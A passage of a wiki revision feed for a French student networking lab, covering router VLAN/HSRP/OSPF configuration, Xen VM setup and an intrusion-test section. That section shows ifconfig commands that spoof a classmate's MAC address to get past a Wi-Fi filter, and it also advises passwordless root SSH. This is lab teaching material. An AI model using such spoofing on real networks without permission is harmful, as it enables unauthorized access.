&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22928</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22928"/>
				<updated>2015-11-13T13:46:45Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé.&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22773</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22773"/>
				<updated>2015-11-06T10:07:35Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22768</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=22768"/>
				<updated>2015-11-06T09:43:58Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
